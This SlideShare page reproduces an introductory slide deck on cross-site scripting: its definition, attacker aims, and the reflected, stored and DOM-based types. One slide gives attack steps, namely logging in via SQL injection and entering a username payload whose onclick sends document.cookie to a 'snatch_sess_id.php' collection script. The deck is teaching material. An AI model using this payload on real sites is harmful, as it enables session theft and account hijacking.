SlideShare a Scribd company logo
XSS ATTACK
WEB ATTACK
CONTENTS
 WHAT IS XSS ATTACK
 XSS ATTACK TYPES
INTRODUCTION
 Cross-site scripting (XSS) is a type of computer security
vulnerability typically found in web applications that enables
malicious attackers to inject client side script into web pages viewed
by other.
ATTACK SCENARIO
An attacker does not target a victim directly. Instead, an attacker would exploit a
vulnerability within a website or web application that the victim would visit,
essentially using the vulnerable website as a vehicle to deliver a malicious script to
the victim’s browser.
ATTACK INTENT
 Hijacking Accounts
 False Advertising & inserting hostile content
 Changing of users settings
 stealing other user’s cookies
 Redirecting to other websites
TYPES OF ATTACK
 REFLECTED (NON PERSISTANT)
 STORED (PERSISTANT)
 DOM BASED
REFLECTED(NON PERSISTANT)
 Reflected XSS involves the reflecting of a malicious script off of a web application,
onto a user’s browser. The script is embedded into a link, and is only activated once
that link is clicked on.
 An attacker convinces a user to follow a malicious URL which injects code into the
resulting page.
 Now the attacker has full access to that pages content
STORED XSS
 Stored XSS, also known as persistent XSS, is the more damaging of
the two. It occurs when a malicious script is injected directly into a
vulnerable web application.
 An attack can affect a large amount of users and the application can
also be infected by a XSS Virus or Worm
DOM XSS
 Document Object Model
 Standard object model for representing html or xhtml
 Problem exists within the page’s client side script
 If an attacker hosts a malicious site, which contains a vulnerable
website on a clients local system, a script can be injected
 Now the attacker can run the privileges of that users browser on
their system.
ATTACK SCENARIO
Steps for XSS Attack
 Step1 – Open techpand.org
 Step2- Perform Login using SQL INJECTION(OR KNOW know
username and password)
 Step3- open ADD New ACCOUNT
 Step4- use below script as username
<a href=#
onclick="document.location='http://techpanda.org/snatch_sess_id.php?c='+escape
(document.cookie);">Dark</a>
XSS ATTACK as Dark
Get Cookie information

More Related Content

What's hot

Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
Daniel Miessler
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
Mohammed A. Imran
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
Mohammed Danish Amber
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
Ali Mattash
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
Moataz Kamel
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
Aaron Weaver
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
Napendra Singh
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
Irfad Imtiaz
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
Niyas Nazar
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
Manish Kumar
 
CSRF Basics
CSRF BasicsCSRF Basics
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
Marco Morana
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
Mentorcs
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Brian Huff
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
Rapid Purple
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
hruth
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
ashish20012
 
Introduction XSS
Introduction XSSIntroduction XSS
Introduction XSS
Aymeric Lagier
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
Hina Rawal
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
Aman Singh
 

What's hot (20)

Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Cross site scripting attacks and defenses
Cross site scripting attacks and defensesCross site scripting attacks and defenses
Cross site scripting attacks and defenses
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Cross Site Scripting
Cross Site ScriptingCross Site Scripting
Cross Site Scripting
 
Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020Secure coding presentation Oct 3 2020
Secure coding presentation Oct 3 2020
 
Cross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert BoxCross Site Scripting Going Beyond the Alert Box
Cross Site Scripting Going Beyond the Alert Box
 
Sql injection - security testing
Sql injection - security testingSql injection - security testing
Sql injection - security testing
 
Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )Introduction to Cross Site Scripting ( XSS )
Introduction to Cross Site Scripting ( XSS )
 
Vulnerabilities in modern web applications
Vulnerabilities in modern web applicationsVulnerabilities in modern web applications
Vulnerabilities in modern web applications
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
CSRF Basics
CSRF BasicsCSRF Basics
CSRF Basics
 
Cross Site Request Forgery Vulnerabilities
Cross Site Request Forgery VulnerabilitiesCross Site Request Forgery Vulnerabilities
Cross Site Request Forgery Vulnerabilities
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)
 
SQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint PresentationSQL Injections - A Powerpoint Presentation
SQL Injections - A Powerpoint Presentation
 
Web application attacks
Web application attacksWeb application attacks
Web application attacks
 
Ppt on sql injection
Ppt on sql injectionPpt on sql injection
Ppt on sql injection
 
Introduction XSS
Introduction XSSIntroduction XSS
Introduction XSS
 
Secure code practices
Secure code practicesSecure code practices
Secure code practices
 
Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)Cross Site Scripting: Prevention and Detection(XSS)
Cross Site Scripting: Prevention and Detection(XSS)
 

Similar to Xss attack

Xss ppt
Xss pptXss ppt
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xss
dcervigni
 
Xss ppt
Xss pptXss ppt
Xss ppt
chanakyac1
 
XSS Exploitation
XSS ExploitationXSS Exploitation
XSS Exploitation
Hacking Articles
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
Nabin Dutta
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
Okan YILDIZ
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
Okan YILDIZ
 
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptxA Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
Gitam Gadtaula
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
Ritesh Gupta
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWA
Rutvik patel
 
Prevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash TechniquePrevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash Technique
IJCSIS Research Publications
 
Study of Cross-Site Scripting Attacks and Their Countermeasures
Study of Cross-Site Scripting Attacks and Their CountermeasuresStudy of Cross-Site Scripting Attacks and Their Countermeasures
Study of Cross-Site Scripting Attacks and Their Countermeasures
Editor IJCATR
 
SeanRobertsThesis
SeanRobertsThesisSeanRobertsThesis
SeanRobertsThesis
Sean Roberts
 
Cross site scripting
Cross site scripting Cross site scripting
Xss
XssXss
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
Daniel Tumser
 
XSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolXSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing tool
Arjun Jain
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security Topics
Shawn Gorrell
 
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
IJECEIAES
 
Xss 101
Xss 101Xss 101

Similar to Xss attack (20)

Xss ppt
Xss pptXss ppt
Xss ppt
 
Cm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xssCm7 secure code_training_1day_xss
Cm7 secure code_training_1day_xss
 
Xss ppt
Xss pptXss ppt
Xss ppt
 
XSS Exploitation
XSS ExploitationXSS Exploitation
XSS Exploitation
 
Cross Site Scripting(XSS)
Cross Site Scripting(XSS)Cross Site Scripting(XSS)
Cross Site Scripting(XSS)
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 
XSS.pdf
XSS.pdfXSS.pdf
XSS.pdf
 
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptxA Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
A Survey of Exploitation and Detection Methods of XSS Vulnerabilities.pptx
 
Cross site scripting (xss)
Cross site scripting (xss)Cross site scripting (xss)
Cross site scripting (xss)
 
STORED XSS IN DVWA
STORED XSS IN DVWASTORED XSS IN DVWA
STORED XSS IN DVWA
 
Prevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash TechniquePrevention of Cross-Site Scripting using Hash Technique
Prevention of Cross-Site Scripting using Hash Technique
 
Study of Cross-Site Scripting Attacks and Their Countermeasures
Study of Cross-Site Scripting Attacks and Their CountermeasuresStudy of Cross-Site Scripting Attacks and Their Countermeasures
Study of Cross-Site Scripting Attacks and Their Countermeasures
 
SeanRobertsThesis
SeanRobertsThesisSeanRobertsThesis
SeanRobertsThesis
 
Cross site scripting
Cross site scripting Cross site scripting
Cross site scripting
 
Xss
XssXss
Xss
 
HallTumserFinalPaper
HallTumserFinalPaperHallTumserFinalPaper
HallTumserFinalPaper
 
XSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing toolXSS-Alert-Pentration testing tool
XSS-Alert-Pentration testing tool
 
.NET Security Topics
.NET Security Topics.NET Security Topics
.NET Security Topics
 
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
ImageSubXSS: an image substitute technique to prevent Cross-Site Scripting at...
 
Xss 101
Xss 101Xss 101
Xss 101
 

More from Manjushree Mashal

Career in cyber security
Career in  cyber securityCareer in  cyber security
Career in cyber security
Manjushree Mashal
 
Cyber security
Cyber securityCyber security
Cyber security
Manjushree Mashal
 
Cyber security
Cyber securityCyber security
Cyber security
Manjushree Mashal
 
Cyber attack
Cyber attackCyber attack
Cyber attack
Manjushree Mashal
 
Dos attack
Dos attackDos attack
Dos attack
Manjushree Mashal
 
Sql injection
Sql injectionSql injection
Sql injection
Manjushree Mashal
 
Network packet analysis -capture and Analysis
Network packet analysis -capture and AnalysisNetwork packet analysis -capture and Analysis
Network packet analysis -capture and Analysis
Manjushree Mashal
 
Network attacks
Network attacksNetwork attacks
Network attacks
Manjushree Mashal
 
Network forensic
Network forensicNetwork forensic
Network forensic
Manjushree Mashal
 
TCP/IP FRAME FORMAT
TCP/IP FRAME FORMATTCP/IP FRAME FORMAT
TCP/IP FRAME FORMAT
Manjushree Mashal
 
Diabetic Retinopathy Analysis using Fundus Image
Diabetic Retinopathy Analysis using Fundus ImageDiabetic Retinopathy Analysis using Fundus Image
Diabetic Retinopathy Analysis using Fundus Image
Manjushree Mashal
 
Manjushree_EC_fresher_2016
Manjushree_EC_fresher_2016Manjushree_EC_fresher_2016
Manjushree_EC_fresher_2016
Manjushree Mashal
 
Tvws ppt 1
Tvws ppt 1Tvws ppt 1
Tvws ppt 1
Manjushree Mashal
 
Leaf chlorophyll concentration using random forest
Leaf chlorophyll concentration using random forestLeaf chlorophyll concentration using random forest
Leaf chlorophyll concentration using random forest
Manjushree Mashal
 
Vlsi design and fabrication ppt
Vlsi design and fabrication  pptVlsi design and fabrication  ppt
Vlsi design and fabrication ppt
Manjushree Mashal
 
underwater communication skills for the new way of devine(2)
 underwater communication skills for the new way of devine(2) underwater communication skills for the new way of devine(2)
underwater communication skills for the new way of devine(2)
Manjushree Mashal
 

More from Manjushree Mashal (16)

Career in cyber security
Career in  cyber securityCareer in  cyber security
Career in cyber security
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber security
Cyber securityCyber security
Cyber security
 
Cyber attack
Cyber attackCyber attack
Cyber attack
 
Dos attack
Dos attackDos attack
Dos attack
 
Sql injection
Sql injectionSql injection
Sql injection
 
Network packet analysis -capture and Analysis
Network packet analysis -capture and AnalysisNetwork packet analysis -capture and Analysis
Network packet analysis -capture and Analysis
 
Network attacks
Network attacksNetwork attacks
Network attacks
 
Network forensic
Network forensicNetwork forensic
Network forensic
 
TCP/IP FRAME FORMAT
TCP/IP FRAME FORMATTCP/IP FRAME FORMAT
TCP/IP FRAME FORMAT
 
Diabetic Retinopathy Analysis using Fundus Image
Diabetic Retinopathy Analysis using Fundus ImageDiabetic Retinopathy Analysis using Fundus Image
Diabetic Retinopathy Analysis using Fundus Image
 
Manjushree_EC_fresher_2016
Manjushree_EC_fresher_2016Manjushree_EC_fresher_2016
Manjushree_EC_fresher_2016
 
Tvws ppt 1
Tvws ppt 1Tvws ppt 1
Tvws ppt 1
 
Leaf chlorophyll concentration using random forest
Leaf chlorophyll concentration using random forestLeaf chlorophyll concentration using random forest
Leaf chlorophyll concentration using random forest
 
Vlsi design and fabrication ppt
Vlsi design and fabrication  pptVlsi design and fabrication  ppt
Vlsi design and fabrication ppt
 
underwater communication skills for the new way of devine(2)
 underwater communication skills for the new way of devine(2) underwater communication skills for the new way of devine(2)
underwater communication skills for the new way of devine(2)
 

Recently uploaded

22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt
KrishnaveniKrishnara1
 
CHINA’S GEO-ECONOMIC OUTREACH IN CENTRAL ASIAN COUNTRIES AND FUTURE PROSPECT
CHINA’S GEO-ECONOMIC OUTREACH IN CENTRAL ASIAN COUNTRIES AND FUTURE PROSPECTCHINA’S GEO-ECONOMIC OUTREACH IN CENTRAL ASIAN COUNTRIES AND FUTURE PROSPECT
CHINA’S GEO-ECONOMIC OUTREACH IN CENTRAL ASIAN COUNTRIES AND FUTURE PROSPECT
jpsjournal1
 
Iron and Steel Technology Roadmap - Towards more sustainable steelmaking.pdf
Iron and Steel Technology Roadmap - Towards more sustainable steelmaking.pdfIron and Steel Technology Roadmap - Towards more sustainable steelmaking.pdf
Iron and Steel Technology Roadmap - Towards more sustainable steelmaking.pdf
RadiNasr
 
Textile Chemical Processing and Dyeing.pdf
Textile Chemical Processing and Dyeing.pdfTextile Chemical Processing and Dyeing.pdf
Textile Chemical Processing and Dyeing.pdf
NazakatAliKhoso2
 
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
IJECEIAES
 
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
Yasser Mahgoub
 
A review on techniques and modelling methodologies used for checking electrom...
A review on techniques and modelling methodologies used for checking electrom...A review on techniques and modelling methodologies used for checking electrom...
A review on techniques and modelling methodologies used for checking electrom...
nooriasukmaningtyas
 
Computational Engineering IITH Presentation
Computational Engineering IITH PresentationComputational Engineering IITH Presentation
Computational Engineering IITH Presentation
co23btech11018
 
TIME DIVISION MULTIPLEXING TECHNIQUE FOR COMMUNICATION SYSTEM
TIME DIVISION MULTIPLEXING TECHNIQUE FOR COMMUNICATION SYSTEMTIME DIVISION MULTIPLEXING TECHNIQUE FOR COMMUNICATION SYSTEM
TIME DIVISION MULTIPLEXING TECHNIQUE FOR COMMUNICATION SYSTEM
HODECEDSIET
 
Casting-Defect-inSlab continuous casting.pdf
Casting-Defect-inSlab continuous casting.pdfCasting-Defect-inSlab continuous casting.pdf
Casting-Defect-inSlab continuous casting.pdf
zubairahmad848137
 
Heat Resistant Concrete Presentation ppt
Heat Resistant Concrete Presentation pptHeat Resistant Concrete Presentation ppt
Heat Resistant Concrete Presentation ppt
mamunhossenbd75
 
CSM Cloud Service Management Presentarion
CSM Cloud Service Management PresentarionCSM Cloud Service Management Presentarion
CSM Cloud Service Management Presentarion
rpskprasana
 
ISPM 15 Heat Treated Wood Stamps and why your shipping must have one
ISPM 15 Heat Treated Wood Stamps and why your shipping must have oneISPM 15 Heat Treated Wood Stamps and why your shipping must have one
ISPM 15 Heat Treated Wood Stamps and why your shipping must have one
Las Vegas Warehouse
 
5214-1693458878915-Unit 6 2023 to 2024 academic year assignment (AutoRecovere...
5214-1693458878915-Unit 6 2023 to 2024 academic year assignment (AutoRecovere...5214-1693458878915-Unit 6 2023 to 2024 academic year assignment (AutoRecovere...
5214-1693458878915-Unit 6 2023 to 2024 academic year assignment (AutoRecovere...
ihlasbinance2003
 
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODELDEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
gerogepatton
 
Advanced control scheme of doubly fed induction generator for wind turbine us...
Advanced control scheme of doubly fed induction generator for wind turbine us...Advanced control scheme of doubly fed induction generator for wind turbine us...
Advanced control scheme of doubly fed induction generator for wind turbine us...
IJECEIAES
 
BPV-GUI-01-Guide-for-ASME-Review-Teams-(General)-10-10-2023.pdf
BPV-GUI-01-Guide-for-ASME-Review-Teams-(General)-10-10-2023.pdfBPV-GUI-01-Guide-for-ASME-Review-Teams-(General)-10-10-2023.pdf
BPV-GUI-01-Guide-for-ASME-Review-Teams-(General)-10-10-2023.pdf
MIGUELANGEL966976
 
KuberTENes Birthday Bash Guadalajara - K8sGPT first impressions
KuberTENes Birthday Bash Guadalajara - K8sGPT first impressionsKuberTENes Birthday Bash Guadalajara - K8sGPT first impressions
KuberTENes Birthday Bash Guadalajara - K8sGPT first impressions
Victor Morales
 
哪里办理(csu毕业证书)查尔斯特大学毕业证硕士学历原版一模一样
哪里办理(csu毕业证书)查尔斯特大学毕业证硕士学历原版一模一样哪里办理(csu毕业证书)查尔斯特大学毕业证硕士学历原版一模一样
哪里办理(csu毕业证书)查尔斯特大学毕业证硕士学历原版一模一样
insn4465
 
basic-wireline-operations-course-mahmoud-f-radwan.pdf
basic-wireline-operations-course-mahmoud-f-radwan.pdfbasic-wireline-operations-course-mahmoud-f-radwan.pdf
basic-wireline-operations-course-mahmoud-f-radwan.pdf
NidhalKahouli2
 

Recently uploaded (20)

22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt22CYT12-Unit-V-E Waste and its Management.ppt
22CYT12-Unit-V-E Waste and its Management.ppt
 
CHINA’S GEO-ECONOMIC OUTREACH IN CENTRAL ASIAN COUNTRIES AND FUTURE PROSPECT
CHINA’S GEO-ECONOMIC OUTREACH IN CENTRAL ASIAN COUNTRIES AND FUTURE PROSPECTCHINA’S GEO-ECONOMIC OUTREACH IN CENTRAL ASIAN COUNTRIES AND FUTURE PROSPECT
CHINA’S GEO-ECONOMIC OUTREACH IN CENTRAL ASIAN COUNTRIES AND FUTURE PROSPECT
 
Iron and Steel Technology Roadmap - Towards more sustainable steelmaking.pdf
Iron and Steel Technology Roadmap - Towards more sustainable steelmaking.pdfIron and Steel Technology Roadmap - Towards more sustainable steelmaking.pdf
Iron and Steel Technology Roadmap - Towards more sustainable steelmaking.pdf
 
Textile Chemical Processing and Dyeing.pdf
Textile Chemical Processing and Dyeing.pdfTextile Chemical Processing and Dyeing.pdf
Textile Chemical Processing and Dyeing.pdf
 
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
Electric vehicle and photovoltaic advanced roles in enhancing the financial p...
 
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
2008 BUILDING CONSTRUCTION Illustrated - Ching Chapter 02 The Building.pdf
 
A review on techniques and modelling methodologies used for checking electrom...
A review on techniques and modelling methodologies used for checking electrom...A review on techniques and modelling methodologies used for checking electrom...
A review on techniques and modelling methodologies used for checking electrom...
 
Computational Engineering IITH Presentation
Computational Engineering IITH PresentationComputational Engineering IITH Presentation
Computational Engineering IITH Presentation
 
TIME DIVISION MULTIPLEXING TECHNIQUE FOR COMMUNICATION SYSTEM
TIME DIVISION MULTIPLEXING TECHNIQUE FOR COMMUNICATION SYSTEMTIME DIVISION MULTIPLEXING TECHNIQUE FOR COMMUNICATION SYSTEM
TIME DIVISION MULTIPLEXING TECHNIQUE FOR COMMUNICATION SYSTEM
 
Casting-Defect-inSlab continuous casting.pdf
Casting-Defect-inSlab continuous casting.pdfCasting-Defect-inSlab continuous casting.pdf
Casting-Defect-inSlab continuous casting.pdf
 
Heat Resistant Concrete Presentation ppt
Heat Resistant Concrete Presentation pptHeat Resistant Concrete Presentation ppt
Heat Resistant Concrete Presentation ppt
 
CSM Cloud Service Management Presentarion
CSM Cloud Service Management PresentarionCSM Cloud Service Management Presentarion
CSM Cloud Service Management Presentarion
 
ISPM 15 Heat Treated Wood Stamps and why your shipping must have one
ISPM 15 Heat Treated Wood Stamps and why your shipping must have oneISPM 15 Heat Treated Wood Stamps and why your shipping must have one
ISPM 15 Heat Treated Wood Stamps and why your shipping must have one
 
5214-1693458878915-Unit 6 2023 to 2024 academic year assignment (AutoRecovere...
5214-1693458878915-Unit 6 2023 to 2024 academic year assignment (AutoRecovere...5214-1693458878915-Unit 6 2023 to 2024 academic year assignment (AutoRecovere...
5214-1693458878915-Unit 6 2023 to 2024 academic year assignment (AutoRecovere...
 
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODELDEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
DEEP LEARNING FOR SMART GRID INTRUSION DETECTION: A HYBRID CNN-LSTM-BASED MODEL
 
Advanced control scheme of doubly fed induction generator for wind turbine us...
Advanced control scheme of doubly fed induction generator for wind turbine us...Advanced control scheme of doubly fed induction generator for wind turbine us...
Advanced control scheme of doubly fed induction generator for wind turbine us...
 
BPV-GUI-01-Guide-for-ASME-Review-Teams-(General)-10-10-2023.pdf
BPV-GUI-01-Guide-for-ASME-Review-Teams-(General)-10-10-2023.pdfBPV-GUI-01-Guide-for-ASME-Review-Teams-(General)-10-10-2023.pdf
BPV-GUI-01-Guide-for-ASME-Review-Teams-(General)-10-10-2023.pdf
 
KuberTENes Birthday Bash Guadalajara - K8sGPT first impressions
KuberTENes Birthday Bash Guadalajara - K8sGPT first impressionsKuberTENes Birthday Bash Guadalajara - K8sGPT first impressions
KuberTENes Birthday Bash Guadalajara - K8sGPT first impressions
 
哪里办理(csu毕业证书)查尔斯特大学毕业证硕士学历原版一模一样
哪里办理(csu毕业证书)查尔斯特大学毕业证硕士学历原版一模一样哪里办理(csu毕业证书)查尔斯特大学毕业证硕士学历原版一模一样
哪里办理(csu毕业证书)查尔斯特大学毕业证硕士学历原版一模一样
 
basic-wireline-operations-course-mahmoud-f-radwan.pdf
basic-wireline-operations-course-mahmoud-f-radwan.pdfbasic-wireline-operations-course-mahmoud-f-radwan.pdf
basic-wireline-operations-course-mahmoud-f-radwan.pdf
 

Xss attack

  • 2. CONTENTS  WHAT IS XSS ATTACK  XSS ATTACK TYPES
  • 3. INTRODUCTION  Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client side script into web pages viewed by other.
  • 4. ATTACK SCENARIO An attacker does not target a victim directly. Instead, an attacker would exploit a vulnerability within a website or web application that the victim would visit, essentially using the vulnerable website as a vehicle to deliver a malicious script to the victim’s browser.
  • 5. ATTACK INTENT  Hijacking Accounts  False Advertising & inserting hostile content  Changing of users settings  stealing other user’s cookies  Redirecting to other websites
  • 6. TYPES OF ATTACK  REFLECTED (NON PERSISTANT)  STORED (PERSISTANT)  DOM BASED
  • 7. REFLECTED(NON PERSISTANT)  Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user’s browser. The script is embedded into a link, and is only activated once that link is clicked on.  An attacker convinces a user to follow a malicious URL which injects code into the resulting page.  Now the attacker has full access to that pages content
  • 8. STORED XSS  Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.  An attack can affect a large amount of users and the application can also be infected by a XSS Virus or Worm
  • 9. DOM XSS  Document Object Model  Standard object model for representing html or xhtml  Problem exists within the page’s client side script  If an attacker hosts a malicious site, which contains a vulnerable website on a clients local system, a script can be injected  Now the attacker can run the privileges of that users browser on their system.
  • 11. Steps for XSS Attack  Step1 – Open techpand.org  Step2- Perform Login using SQL INJECTION(OR KNOW know username and password)  Step3- open ADD New ACCOUNT  Step4- use below script as username <a href=# onclick="document.location='http://techpanda.org/snatch_sess_id.php?c='+escape (document.cookie);">Dark</a>
  • 12.